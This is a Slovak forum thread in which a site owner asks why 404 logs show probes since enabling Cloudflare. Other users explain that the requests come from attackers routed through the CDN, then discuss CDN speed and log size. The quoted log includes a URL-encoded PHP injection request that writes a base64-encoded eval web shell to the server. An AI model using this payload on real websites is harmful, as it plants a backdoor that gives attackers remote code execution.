CloudFlare je privelmi "zvedavy"

Sekcia o programovaní, programovacích jazykoch...
Užívateľov profilový obrázok
lepermessiah
Používateľ
Používateľ
Príspevky: 1945
Dátum registrácie: Št 30. Dec, 2010, 02:41
Bydlisko: ZV / BJ

CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa lepermessiah » Ut 02. Aug, 2016, 03:07

Caute,

nestretli ste sa s problemom, ze mate free CDN u CloudFlare a ten vam lozi po stranke a vyslovene sa snazi najst nejaky backdoor ? Sem-tam kontrolujem 404 logy na jednom webe co spravujem a odkedy je tam to CDN (stranka je uzasne rychla) sa objavuju "nenajdene" stranky, napriklad:
  • /configuration.php
    /configbak.php
    /mysql.php
    /load-config.php
    /.joomla.system.php
    /.config.php
    /wp-settings.php
    /webconfig.txt.php
    /.cpanel_config.php
    /administrator?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
..a dalo by sa pokracovat. Web nebezi na ziadnom CMS, cize sa neobavam toho, ze by raz nejaky backdoor nasli, no zaujimalo by ma, preco sa o to snazia a ci sa voci tomu da nejako branit (pri zachovani free CDN)
PS: vsetky nenajdene stranky (resp. subory) su vyhladavane 99% z IPciek CloudFlare ako 173.245.55.71 a 199.27.133.165
Spoiler: ukázať
CPU: Intel Core i5 - 4590
MB: ASUS H97M-Plus
RAM: 2x8GB Crucial Ballistix Elite 1866 CL9 1.5V @ 1600 CL9 CR1
HDD: Samsung 960 Pro 512GB, WD RED 2TB R.1, WD MyBook3 Studio 1.5TB
GPU: GB 7950 3GB OC
Sound: ASUS Xonar Essence ST
PSU: Seasonic X-660
CASE: BitFenix Phenom M
WATER: XSPC EX240 + 2xNoctuaP12, HWLabs Nemesis GTX140 + NoctuaA14PWM, EK Acetal + EN CPU & GPU, ACool VPP655 + EK-D5 X-RES 140
LCD: Dell UltraSharp U2913WM + blink(1) + ambiledHD
Peripherals: Gigaworks T20 r.1, Superlux HD-662B, Logitech G810 + G403 Wireless, MS LifeCam Studio, 1TB mSATA USB-C Samsung 840EVO
+ laptop: Lenovo X1 Yoga 20JE-S0AJ00 + Samsung 970 EVO 1TB + Samsung 840 1TB mSATA / USB-C

Užívateľov profilový obrázok
Chris
Pokročilý používateľ
Pokročilý používateľ
Príspevky: 4694
Dátum registrácie: Pi 13. Jan, 2006, 02:00
Bydlisko: Bratislava
Kontaktovať užívateľa:

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa Chris » Ut 02. Aug, 2016, 07:38

ja som ho pouzival ale nijako som podla testov nevidel rozdiel tak som zrusil.

Aj kvoli tomu ze tam nefungoval spravne tapatalk s kunenou ak bolo CDN zapnute.

NGINX so spravne nastavenou cache will do the job
Master of PaloAlto NGFWs, Cisco ASAs

Užívateľov profilový obrázok
lepermessiah
Používateľ
Používateľ
Príspevky: 1945
Dátum registrácie: Št 30. Dec, 2010, 02:41
Bydlisko: ZV / BJ

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa lepermessiah » Ut 02. Aug, 2016, 09:25

tak v tomto pripade si o NGINX mozem len snivat ;)

z testov je to zhruba o 40% rychlejsie, je to staticke, caching v htaccess snad nastaveny dobre, no je tam vela malych obrazkov - 38% obsahu a html tvori 50%, cize chapeme ze to nie je nic velke, no ten CDN tam robi zazraky, preto by som ho nechcel odstavit
Spoiler: ukázať
CPU: Intel Core i5 - 4590
MB: ASUS H97M-Plus
RAM: 2x8GB Crucial Ballistix Elite 1866 CL9 1.5V @ 1600 CL9 CR1
HDD: Samsung 960 Pro 512GB, WD RED 2TB R.1, WD MyBook3 Studio 1.5TB
GPU: GB 7950 3GB OC
Sound: ASUS Xonar Essence ST
PSU: Seasonic X-660
CASE: BitFenix Phenom M
WATER: XSPC EX240 + 2xNoctuaP12, HWLabs Nemesis GTX140 + NoctuaA14PWM, EK Acetal + EN CPU & GPU, ACool VPP655 + EK-D5 X-RES 140
LCD: Dell UltraSharp U2913WM + blink(1) + ambiledHD
Peripherals: Gigaworks T20 r.1, Superlux HD-662B, Logitech G810 + G403 Wireless, MS LifeCam Studio, 1TB mSATA USB-C Samsung 840EVO
+ laptop: Lenovo X1 Yoga 20JE-S0AJ00 + Samsung 970 EVO 1TB + Samsung 840 1TB mSATA / USB-C

Užívateľov profilový obrázok
Chris
Pokročilý používateľ
Pokročilý používateľ
Príspevky: 4694
Dátum registrácie: Pi 13. Jan, 2006, 02:00
Bydlisko: Bratislava
Kontaktovať užívateľa:

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa Chris » Ut 02. Aug, 2016, 09:50

hod sem porovnanie so zapnutym a vypnutym CDN :)

napr. z

https://gtmetrix.com/
Master of PaloAlto NGFWs, Cisco ASAs

Užívateľov profilový obrázok
lepermessiah
Používateľ
Používateľ
Príspevky: 1945
Dátum registrácie: Št 30. Dec, 2010, 02:41
Bydlisko: ZV / BJ

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa lepermessiah » Ut 02. Aug, 2016, 10:58

ved prave GTMetrix pouzivam aj ja, od toho sa odrazam, ze to funguje realne (a tiez pocitovo na pocitaci/mobile to loaduje ovela rychlejsie), nacitavanie bolo cca 1.5s a s CDN 1.1s, velkost stranky si nepamatam, nieco okolo 230kb ..
Spoiler: ukázať
CPU: Intel Core i5 - 4590
MB: ASUS H97M-Plus
RAM: 2x8GB Crucial Ballistix Elite 1866 CL9 1.5V @ 1600 CL9 CR1
HDD: Samsung 960 Pro 512GB, WD RED 2TB R.1, WD MyBook3 Studio 1.5TB
GPU: GB 7950 3GB OC
Sound: ASUS Xonar Essence ST
PSU: Seasonic X-660
CASE: BitFenix Phenom M
WATER: XSPC EX240 + 2xNoctuaP12, HWLabs Nemesis GTX140 + NoctuaA14PWM, EK Acetal + EN CPU & GPU, ACool VPP655 + EK-D5 X-RES 140
LCD: Dell UltraSharp U2913WM + blink(1) + ambiledHD
Peripherals: Gigaworks T20 r.1, Superlux HD-662B, Logitech G810 + G403 Wireless, MS LifeCam Studio, 1TB mSATA USB-C Samsung 840EVO
+ laptop: Lenovo X1 Yoga 20JE-S0AJ00 + Samsung 970 EVO 1TB + Samsung 840 1TB mSATA / USB-C

Užívateľov profilový obrázok
shiro
najsilnejší, najkrajší, najmúdrejší BOSS
najsilnejší, najkrajší, najmúdrejší BOSS
Príspevky: 7201
Dátum registrácie: Št 21. Dec, 2006, 02:00
Bydlisko: Banska Bystrica
Kontaktovať užívateľa:

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa shiro » Ut 02. Aug, 2016, 16:25

Skorej by som riesil podstatu celeho tohoto cirkusu, a sice:
mate free CDN u CloudFlare a ten vam lozi po stranke a vyslovene sa snazi najst nejaky backdoor ?
...co je na tom akoze zle a preco to vobec dakomu vadi?
Obzvlast ked vieme co za ludi bezne weby programuje a kolko dier tam byva? Mali by ste byt este vdacni ze dakto to robi zadara aspon nejako...
Ryzen 7 3700X, SilentiumPC Fera 3 HE1224, Patriot Viper 4 Blackout 16GB DDR4-3600 CL17, Asrock X570M Pro4, Samsung 970evo plus 250GB NVMe, 2x Corsair MP510 1TB NVMe, Crucial MX300 525GB SATA, Gainward GTX1060 6GB, Corsair RM550x, 24" BenQ GW2470H, Case fans Noctua NF-S12B redux 1200 PWM
iPad Air 16GB, iPhone SE 32GB

faugusztin
Moderátor
Moderátor
Príspevky: 15389
Dátum registrácie: Ut 26. Feb, 2008, 14:00
Bydlisko: Bratislava/Štúrovo

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa faugusztin » Ut 02. Aug, 2016, 21:38

S Cloudflare to ma spolocne akurat to, ze si sa stal "zaujimavym cielom" v momente ked si presiel pod Cloudflare. Samo o sebe tie query oni nerobia. A kedze cloudflare cachuje tvoje stranky, tak VZDY budes mat IP v logoch z adries CF.

Užívateľov profilový obrázok
lepermessiah
Používateľ
Používateľ
Príspevky: 1945
Dátum registrácie: Št 30. Dec, 2010, 02:41
Bydlisko: ZV / BJ

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa lepermessiah » St 03. Aug, 2016, 17:34

aha, takto som sa na to nepozeral :D diki faugusztin

@shiro no vadi to mne, lebo za tyzden to spravi 12MB log a hosting ma len 50MB :D a vypnut by som to nerad, kedze to obcas aj pomoze s identifikovanim problemu ako stratene obrazky a tak ..
Spoiler: ukázať
CPU: Intel Core i5 - 4590
MB: ASUS H97M-Plus
RAM: 2x8GB Crucial Ballistix Elite 1866 CL9 1.5V @ 1600 CL9 CR1
HDD: Samsung 960 Pro 512GB, WD RED 2TB R.1, WD MyBook3 Studio 1.5TB
GPU: GB 7950 3GB OC
Sound: ASUS Xonar Essence ST
PSU: Seasonic X-660
CASE: BitFenix Phenom M
WATER: XSPC EX240 + 2xNoctuaP12, HWLabs Nemesis GTX140 + NoctuaA14PWM, EK Acetal + EN CPU & GPU, ACool VPP655 + EK-D5 X-RES 140
LCD: Dell UltraSharp U2913WM + blink(1) + ambiledHD
Peripherals: Gigaworks T20 r.1, Superlux HD-662B, Logitech G810 + G403 Wireless, MS LifeCam Studio, 1TB mSATA USB-C Samsung 840EVO
+ laptop: Lenovo X1 Yoga 20JE-S0AJ00 + Samsung 970 EVO 1TB + Samsung 840 1TB mSATA / USB-C

Napísať odpoveď

Návrat na "Programovanie"